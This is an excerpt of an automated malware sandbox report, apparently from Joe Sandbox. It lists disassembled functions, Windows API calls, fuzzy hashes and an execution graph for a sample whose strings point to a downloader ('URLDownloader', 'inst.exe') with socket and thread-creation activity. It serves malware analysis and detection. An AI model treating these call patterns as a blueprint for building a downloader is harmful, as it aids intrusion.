                                                                                                                                                                      • Instruction Fuzzy Hash: A0F0C975900224DFE71ADF58DC88A9577B8FB0D350B018069F909C7322CB34E911CB54
                                                                                                                                                                      Function 0286F057 Relevance: 6.1, APIs: 4, Instructions: 121COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 0286FF47: NdrClientCall2.RPCRT4 ref: 0286FF66
                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F16C
                                                                                                                                                                      • CoTaskMemFree.COMBASE(00000000), ref: 0286F179
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FreeTask$Call2Client
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3085621743-0
                                                                                                                                                                      • Opcode ID: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction ID: d144b95598f01d7cf71f5bdaff15b8026ee57b8986f99e38e747a1526236fb14
                                                                                                                                                                      • Opcode Fuzzy Hash: 2f53cd99de7b70502dbfb43a252906e75cd8ef5dbbaed62b935777ebfb7fcb6a
                                                                                                                                                                      • Instruction Fuzzy Hash: C35104B8D0020DEBCF05CF94D888BFEB7B6BF58308F108149E616A7640D735AA85CB95
                                                                                                                                                                      Function 02863FF7 Relevance: 6.1, APIs: 4, Instructions: 94COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,00000000,00000000), ref: 0286400E
                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,?), ref: 02864068
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,00000000,00000000), ref: 02864080
                                                                                                                                                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000), ref: 028640CC
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ByteCharMultiWide
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 626452242-0
                                                                                                                                                                      • Opcode ID: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                      • Instruction ID: 0b4b502acff8624c61df70e4b9a485c97e45208924927cf16a8ca1c3cf5678e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 34b2c7f5b494ccf67b9d325744f33ca0ea89d0e807b565f945f2959b528e33de
                                                                                                                                                                      • Instruction Fuzzy Hash: 383134B9E40204BFEB14EF98CC86FAEB7B5EB48710F204254F615AB2C1D671AA10CB55
                                                                                                                                                                      Function 1000D330 Relevance: 6.1, APIs: 4, Instructions: 77COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ??0_Lockit@std@@QAE@H@Z.MSVCP140(00000000,?,?,10011CF6,000000FF,?,1000CB92,?), ref: 1000D350
                                                                                                                                                                      • ??Bid@locale@std@@QAEIXZ.MSVCP140(?,?,10011CF6,000000FF,?,1000CB92), ref: 1000D36B
                                                                                                                                                                      • ?_Getcat@?$codecvt@DDU_Mbstatet@@@std@@SAIPAPBVfacet@locale@2@PBV42@@Z.MSVCP140(00000000,1000CB92,?), ref: 1000D39F
                                                                                                                                                                      • ??1_Lockit@std@@QAE@XZ.MSVCP140(?), ref: 1000D417
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Lockit@std@@$??0_??1_Bid@locale@std@@Getcat@?$codecvt@Mbstatet@@@std@@V42@@Vfacet@locale@2@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1566052064-0
                                                                                                                                                                      • Opcode ID: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                      • Instruction ID: 4d9198b2984e5e082309ff7aa8a3130d82e8df6aeec633f907ab193b7f9989e7
                                                                                                                                                                      • Opcode Fuzzy Hash: 2c848dbf772fb136aa0b1a4503c2d55199b9e41e15513577ea7fb89fc6818d4e
                                                                                                                                                                      • Instruction Fuzzy Hash: 79313EB4D00259DFDB04DFA4C895BEEBBB4FF48350F208619E915A3395DB34AA40CBA1
                                                                                                                                                                      Function 10010BB0 Relevance: 6.1, APIs: 4, Instructions: 76COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • __RTC_Initialize.LIBCMT ref: 10010BFD
                                                                                                                                                                        • Part of subcall function 100114A3: InitializeSListHead.KERNEL32(10017318,10010C07,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 100114A8
                                                                                                                                                                      • _initterm_e.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012320,10012324,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C16
                                                                                                                                                                      • _initterm.API-MS-WIN-CRT-RUNTIME-L1-1-0(10012300,1001231C,10014EC8,00000010,10010B98,?,?,?,10010DBE,?,00000001,?,?,00000001,?,10014F10), ref: 10010C34
                                                                                                                                                                      • ___scrt_is_nonwritable_in_current_image.LIBCMT ref: 10010C67
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize$HeadList___scrt_is_nonwritable_in_current_image_initterm_initterm_e
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 590286634-0
                                                                                                                                                                      • Opcode ID: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                      • Instruction ID: 39f7e9c7f58ab3c24a5f1c768587727ae30ebfb406468ad2b612d2fa9f71a151
                                                                                                                                                                      • Opcode Fuzzy Hash: 5bd69a3745def1f0a502212b4dd3d1811da621de82d7f1043a7733e41357daf7
                                                                                                                                                                      • Instruction Fuzzy Hash: D421027A7482129AEB18EBB898027CC37A1EF11364F108205F4C96F1C3DBF1E5C18A96
                                                                                                                                                                      Function 1000BEC0 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 1000CAC0: ?rdbuf@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_streambuf@DU?$char_traits@D@std@@@2@XZ.MSVCP140(?,1000BEEA,1000CEAD,1000CEAD,6CC04730), ref: 1000CAE4
                                                                                                                                                                      • ?good@ios_base@std@@QBE_NXZ.MSVCP140(1000CEAD,1000CEAD), ref: 1000BEFC
                                                                                                                                                                      • ?tie@?$basic_ios@DU?$char_traits@D@std@@@std@@QBEPAV?$basic_ostream@DU?$char_traits@D@std@@@2@XZ.MSVCP140 ref: 1000BF1D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: U?$char_traits@$D@std@@@2@D@std@@@std@@$?good@ios_base@std@@?rdbuf@?$basic_ios@?tie@?$basic_ios@V?$basic_ostream@V?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3792166412-0
                                                                                                                                                                      • Opcode ID: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                      • Instruction ID: 6403fa240c7e006dd5772fa615f9af8d9caa538eb968de4636cddec1bc8cd2ef
                                                                                                                                                                      • Opcode Fuzzy Hash: ae12adcc2c32b88dafc5603b844eb9ac3b5d40635a87f722cfffed01479731d9
                                                                                                                                                                      • Instruction Fuzzy Hash: EF216D7460064AEFD704CF54C984BAEBBB1FF49344F14C269E8165B391C730E940CB91
                                                                                                                                                                      Function 1000B2A0 Relevance: 6.1, APIs: 4, Instructions: 58COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2AD
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2BA
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2C5
                                                                                                                                                                      • ?gptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140 ref: 1000B2D2
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?gptr@?$basic_streambuf@$?egptr@?$basic_streambuf@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2950233615-0
                                                                                                                                                                      • Opcode ID: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                      • Instruction ID: 286a1d44accefb07714ea732755267c184901f6fbadf7b8dc8f0254af49e132d
                                                                                                                                                                      • Opcode Fuzzy Hash: 1783d4faa295622926a9acba5ea9b70e108ed3dee63503e54d904724665c109e
                                                                                                                                                                      • Instruction Fuzzy Hash: A5110D74E00219EFDB14DFA4D9958AEB7F5FF48240B204199E805A7355EB30AF01EB90
                                                                                                                                                                      Function 1000C0C0 Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,?,1000B486), ref: 1000C0CA
                                                                                                                                                                      • ?eback@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0DD
                                                                                                                                                                      • ?egptr@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IBEPADXZ.MSVCP140(?,1000B486), ref: 1000C0EC
                                                                                                                                                                      • ?setg@?$basic_streambuf@DU?$char_traits@D@std@@@std@@IAEXPAD00@Z.MSVCP140(1000B44A,1000B44A,1000B449,?,1000B486), ref: 1000C110
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: D@std@@@std@@U?$char_traits@$?eback@?$basic_streambuf@$?egptr@?$basic_streambuf@?setg@?$basic_streambuf@D00@
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3089488326-0
                                                                                                                                                                      • Opcode ID: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                      • Instruction ID: e6559f61c40ac0d619c819a68eafb266e25295ce9371c656e40cb26db6e47210
                                                                                                                                                                      • Opcode Fuzzy Hash: 9fea32db6d82a8732664cb0fa318f11d1207675337fcaee34ad8ebc0f3171566
                                                                                                                                                                      • Instruction Fuzzy Hash: E5F0FF70900108EFCB08DF98CE9599DB7B6FF48301B20819EE406A3352CB31AF50EB54
                                                                                                                                                                      Function 028705E7 Relevance: 6.0, APIs: 4, Instructions: 28threadsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentThread.KERNEL32 ref: 028705F4
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000), ref: 028705FB
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100048C0,00000000,00000000,00000000), ref: 02870610
                                                                                                                                                                      • CreateThread.KERNEL32(00000000,00000000,100100C0,00000000,00000000,00000000), ref: 02870625
                                                                                                                                                                        • Part of subcall function 02861147: LoadLibraryW.KERNEL32(10012398), ref: 02861152
                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123AC), ref: 02861164
                                                                                                                                                                        • Part of subcall function 02861147: GetProcAddress.KERNEL32(?,100123C0), ref: 02861178
                                                                                                                                                                        • Part of subcall function 02861147: GetModuleHandleA.KERNEL32(00000000), ref: 028611D4
                                                                                                                                                                        • Part of subcall function 02861147: RegisterClassW.USER32(?), ref: 028611E8
                                                                                                                                                                        • Part of subcall function 02861147: CreateWindowExW.USER32(00000000,100123D8,100123EC,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?), ref: 0286120D
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateThread$AddressProc$ClassCurrentHandleLibraryLoadModuleObjectRegisterSingleWaitWindow
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 487361192-0
                                                                                                                                                                      • Opcode ID: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                      • Instruction ID: 88f0037c1de4a8ddbfcfeb8c9d98e3c9592c6855352256938697fb6879bba5e2
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe67e59d9fa8f08b192819371fb0ced37870faed25ae35d93da0e6e918bcc92
                                                                                                                                                                      • Instruction Fuzzy Hash: 12E002B53C4354BAF261B7E45C8FF593655AB09F42F608650F349BD0E1CAF4A450CA2E
                                                                                                                                                                      Function 028713C0 Relevance: 6.0, APIs: 4, Instructions: 25timethreadCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00000001), ref: 028713D2
                                                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 028713E1
                                                                                                                                                                      • GetCurrentProcessId.KERNEL32 ref: 028713EA
                                                                                                                                                                      • QueryPerformanceCounter.KERNEL32(?), ref: 028713F7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1778533321.0000000002860000.00000040.00001000.00020000.00000000.sdmp, Offset: 02860000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_2860000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentTime$CounterFilePerformanceProcessQuerySystemThread
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2933794660-0
                                                                                                                                                                      • Opcode ID: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction ID: 0a3c688fa97bd66b33bde44f19f6c44622bf0dc03c57f15caf060906c92fb81b
                                                                                                                                                                      • Opcode Fuzzy Hash: f86ba159a5725a827743bc82e35b82d2db29b328119a317c3cdfdebdb067eff7
                                                                                                                                                                      • Instruction Fuzzy Hash: 45F062B4D1021DEBDB05DBB4CA8999EBBF4FF1D200B918696E412E7111E730EB64DB50
                                                                                                                                                                      Function 100046A0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 144COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 100046D3
                                                                                                                                                                      • Concurrency::task_continuation_context::task_continuation_context.LIBCPMTD ref: 100047D2
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Concurrency::task_continuation_context::task_continuation_contextFileModuleName
                                                                                                                                                                      • String ID: .exe
                                                                                                                                                                      • API String ID: 2188046178-4119554291
                                                                                                                                                                      • Opcode ID: 7c1adb2ab773884ace89058cb2ac793d15e5cf7632ab6271f58e31800855c332
                                                                                                                                                                      • Instruction ID: e9e11cb9fd6853f183fefa1d41d0e0024c16e6e010e8b744e496187a2de98be2
                                                                                                                                                                      • Opcode Fuzzy Hash: 7c1adb2ab773884ace89058cb2ac793d15e5cf7632ab6271f58e31800855c332
                                                                                                                                                                      • Instruction Fuzzy Hash: FE51467480424CEFEB14CBA4CC91BEEBBB5EF54340F148199E11977296DB302A49CBA2
                                                                                                                                                                      Function 10010771 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 27COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • AcquireSRWLockExclusive.KERNEL32(100172D4,?,URLDownloader,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190), ref: 1001077C
                                                                                                                                                                      • ReleaseSRWLockExclusive.KERNEL32(100172D4,?,1000177C,100176B8,?,?,?,?,100019DB,inst.exe,00C40000,80000000,80000000,00000190,00000078,00000000), ref: 100107B6
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.1781648815.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.1781607446.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781724637.0000000010012000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781825804.0000000010017000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.1781861555.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_10000000_UNK_.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ExclusiveLock$AcquireRelease
                                                                                                                                                                      • String ID: URLDownloader
                                                                                                                                                                      • API String ID: 17069307-1891997712
                                                                                                                                                                      • Opcode ID: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                      • Instruction ID: 8654295f68b371237154e9a797b482e4a7d7525e36026ba3eb3070c176022b3d
                                                                                                                                                                      • Opcode Fuzzy Hash: 9f1511a7a3ffbcca7e38548f47a2cc02b1a111f10bc6b3d82736ec6af61c00fc
                                                                                                                                                                      • Instruction Fuzzy Hash: 87F0A734A04211DBD321DF14C844A65B7B4FB49770F10432EF9A98B2E1D774E8C2CE51

                                                                                                                                                                      Non-executed Functions

                                                                                                                                                                      Function 25ABFF09 Relevance: .0, Instructions: 21COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000002.00000002.2562238563.0000000025ABC000.00000004.00000010.00020000.00000000.sdmp, Offset: 25ABC000, based on PE: false
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_2_2_25abc000_Synaptics.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID:
                                                                                                                                                                      • Opcode ID: 961809617d7fb091d304b8be0fd63dac970934c5e617bfb645b6df049ab276f8
                                                                                                                                                                      • Instruction ID: b6b2829e21fe090726dab98c88c87c1fa77f7a472e63331c37cc6ffb893d933d
                                                                                                                                                                      • Opcode Fuzzy Hash: 961809617d7fb091d304b8be0fd63dac970934c5e617bfb645b6df049ab276f8
                                                                                                                                                                      • Instruction Fuzzy Hash: 2BE04F6209DBC2EED7070B7488765457FB1ED1722431D45D3CAD0CE067D22C888AC323

                                                                                                                                                                      Execution Graph

                                                                                                                                                                      Execution Coverage:5.3%
                                                                                                                                                                      Dynamic/Decrypted Code Coverage:100%
                                                                                                                                                                      Signature Coverage:0.3%
                                                                                                                                                                      Total number of Nodes:604
                                                                                                                                                                      Total number of Limit Nodes:24
                                                                                                                                                                      execution_graph 43371 2c7f927 43372 2c7fb9a 43371->43372 43377 2c65ef8 43372->43377 43381 2c660df 43372->43381 43385 2c7f997 43372->43385 43379 2c65f68 43377->43379 43378 2c7f9b7 43379->43378 43389 2c61100 43379->43389 43382 2c660e5 43381->43382 43411 2c611b0 43382->43411 43384 2c7fab1 GetCurrentThreadId 43386 2c65f68 43385->43386 43387 2c61100 70 API calls 43386->43387 43388 2c7f9b7 43386->43388 43387->43386 43390 2c61111 43389->43390 43391 2c6110b 43389->43391 43397 2c66ba0 43390->43397 43391->43379 43393 2c61134 VirtualAlloc 43394 2c6116f 43393->43394 43395 2c6118a VirtualFree 43394->43395 43396 2c61198 43394->43396 43395->43396 43396->43379 43398 2c66bad 43397->43398 43401 2c67d77 __ctrlfp __floor_pentium4 43397->43401 43399 2c66bde 43398->43399 43398->43401 43406 2c66c28 43399->43406 43408 2c67a9b 67 API calls __controlfp_s 43399->43408 43400 2c67de5 __floor_pentium4 43405 2c67dd2 __ctrlfp 43400->43405 43410 2c6bc80 67 API calls 6 library calls 43400->43410 43401->43400 43404 2c67dc2 43401->43404 43401->43405 43409 2c6bc2b 66 API calls 3 library calls 43404->43409 43405->43393 43406->43393 43408->43406 43409->43405 43410->43405 43413 2c611bd 43411->43413 43412 2c611c6 43412->43384 43413->43412 43414 2c66ba0 __floor_pentium4 68 API calls 43413->43414 43415 2c611ee 43414->43415 43416 2c61214 43415->43416 43417 2c6121b VirtualAlloc 43415->43417 43416->43384 43418 2c61236 43417->43418 43419 2c61247 VirtualFree 43418->43419 43419->43384 43420 2c65e07 43421 2c7f0f9 RegQueryValueExW 43420->43421 43422 2c63f35 __wcsrev 43421->43422 43423 2c632e0 6 API calls 43424 2c62d80 ResetEvent InterlockedExchange timeGetTime socket 43425 2c62dfc lstrlenW WideCharToMultiByte 43424->43425 43426 2c62de8 43424->43426 43445 2c667ff 43425->43445 43478 2c66815 43426->43478 43429 2c62df6 43431 2c62e59 moneypunct 43432 2c62e96 43431->43432 43433 2c62e60 htons connect 43431->43433 43435 2c66815 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43432->43435 43433->43432 43434 2c62eab setsockopt setsockopt setsockopt setsockopt 43433->43434 43436 2c62f24 WSAIoctl 43434->43436 43437 2c62f52 InterlockedExchange 43434->43437 43438 2c62ea5 43435->43438 43436->43437 43457 2c6721b 43437->43457 43441 2c6721b 755 API calls 43442 2c62f91 43441->43442 43443 2c66815 __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 43442->43443 43444 2c62fa6 43443->43444 43449 2c66f17 43445->43449 43447 2c62e22 lstrlenW WideCharToMultiByte gethostbyname 43447->43431 43449->43447 43453 2c66f3d std::exception::exception 43449->43453 43486 2c66e83 43449->43486 43503 2c68550 DecodePointer 43449->43503 43450 2c66f7b 43505 2c66e24 66 API calls std::exception::operator= 43450->43505 43452 2c66f85 43506 2c67836 RaiseException 43452->43506 43453->43450 43504 2c673e9 76 API calls __cinit 43453->43504 43456 2c66f96 43458 2c6723f 43457->43458 43459 2c6722b 43457->43459 43515 2c69754 TlsGetValue 43458->43515 43542 2c6710d 66 API calls __getptd_noexit 43459->43542 43462 2c67230 43543 2c68702 11 API calls __controlfp_s 43462->43543 43467 2c672a2 43544 2c66e49 66 API calls 2 library calls 43467->43544 43470 2c672a8 43472 2c62f79 43470->43472 43545 2c67133 66 API calls 3 library calls 43470->43545 43472->43441 43475 2c67267 CreateThread 43475->43472 43477 2c6729a GetLastError 43475->43477 43603 2c671b6 43475->43603 43477->43467 43479 2c6681f IsDebuggerPresent 43478->43479 43480 2c6681d 43478->43480 43955 2c6b5e6 43479->43955 43480->43429 43483 2c6794f SetUnhandledExceptionFilter UnhandledExceptionFilter 43484 2c67974 GetCurrentProcess TerminateProcess 43483->43484 43485 2c6796c __call_reportfault 43483->43485 43484->43429 43485->43484 43487 2c66f00 43486->43487 43496 2c66e91 43486->43496 43513 2c68550 DecodePointer 43487->43513 43489 2c66f06 43514 2c6710d 66 API calls __getptd_noexit 43489->43514 43492 2c66ebf RtlAllocateHeap 43493 2c66ef8 43492->43493 43492->43496 43493->43449 43495 2c66e9c 43495->43496 43507 2c68508 66 API calls __NMSG_WRITE 43495->43507 43508 2c68359 66 API calls 6 library calls 43495->43508 43509 2c68098 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 43495->43509 43496->43492 43496->43495 43497 2c66eec 43496->43497 43501 2c66eea 43496->43501 43510 2c68550 DecodePointer 43496->43510 43511 2c6710d 66 API calls __getptd_noexit 43497->43511 43512 2c6710d 66 API calls __getptd_noexit 43501->43512 